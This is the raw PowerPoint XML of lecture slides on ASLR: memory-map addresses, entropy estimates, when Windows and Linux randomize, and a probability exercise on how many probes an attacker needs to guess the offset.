              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-p bffeb000 00:00 0          [stack]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="4953000"/>
            <a:ext cx="6934200" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 17864"/>
              <a:gd name="adj2" fmla="val -63530"/>
              <a:gd name="adj3"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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>~ 27 bits between bffeb000, b7ffee00.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Cambria"/>
              <a:cs typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Top 4 not touched by PAX.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>&lt; ~24 bits of randomness.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Shacham</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> et al report 16 bits in reality for x86 on Linux.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Cambria"/>
              <a:cs typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168893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6172200" y="4543614"/>
            <a:ext cx="2114106" cy="2314386"/>
            <a:chOff x="3680125" y="2533274"/>
            <a:chExt cx="2114493" cy="2314135"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 1744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0125" y="2533274"/>
              <a:ext cx="2114493" cy="21144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70"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="766275">
              <a:off x="4189287" y="4447342"/>
              <a:ext cx="1435910" cy="400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solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                </a:rPr>
                <a:t>Randomize</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="B64926"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>andomize?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1123950"/>
            <a:ext cx="8385175" cy="5251450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When the machine starts? (Windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assign each module an address once per boot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a process starts? (Linux)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constant re-randomization for all child processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2538949396"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="72980"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="7298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Game for ASLR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344488" y="1123950"/>
            <a:ext cx="8189912" cy="5251450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ttempted attack with randomization guess </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is “a probe”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Success = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>is correct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Failure = detectable crash or fail to exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Assume 16 bits of randomness available for ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Game:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>In expectation, how many probes are necessary to guess </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>Scenario 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> not randomized after each probe (Windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>Scenario 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> re-randomized after each probe (Linux)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4280346849"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="137093"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="137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1219200"/>
            <a:ext cx="8001000" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0" smtClean="0"/>
              <a:t>What is the expected number of probes to hack the machine? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="2819400"/>
            <a:ext cx="8001000" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Pr[Success</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0" smtClean="0"/>
              <a:t> on exactly trial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0" smtClean="0"/>
              <a:t>]?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0" smtClean="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Pr[Success</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0" smtClean="0"/>
              <a:t> by trial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" dirty="0" smtClean="0"/>
              <a:t>]?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 9"/>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2622986103"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="149456"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="14945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t>ASLR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17410" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Traditional exploits need precise addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>tack-based overflows:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> location of shell code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> library addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>program’s memory layout is fixed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>stack, heap, libraries etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>randomize addresses of each region!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18917862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1: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not Randomized After Each Probe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Content Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pretend that each possible offset is written on a ball.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> balls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This scenario is like selecting balls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>without replacement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>until we get the ball with the randomization offset written on it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1714500" y="5599111"/>
            <a:ext cx="2057400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Connector 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4915694" y="5598317"/>
            <a:ext cx="2057400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2743200" y="6627811"/>
            <a:ext cx="3200400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Oval 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="48006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1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Oval 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="54102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2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Oval 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="51054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4</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Oval 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="56388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3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Oval 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="51816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7</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Oval 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="47244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9</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Oval 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="57912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i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
